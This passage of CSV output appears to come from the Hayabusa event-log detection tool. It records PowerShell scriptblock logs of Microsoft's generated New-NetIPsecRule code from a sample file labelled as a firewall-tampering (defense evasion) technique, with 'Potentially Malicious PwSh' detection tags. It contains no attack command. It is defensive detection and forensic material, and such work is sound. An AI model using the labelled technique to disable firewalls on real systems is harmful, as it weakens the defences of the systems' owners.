= 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 
'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.Contains",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { 
$__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, 
$script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = 
$false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.Contains",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,Key('Enabled')) { [object]$__cmdletization_value = ${Enabled} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'KeyModule'; ParameterType = 
'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = 
${LocalTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} },../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,Key('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; 
Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { 
[object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = 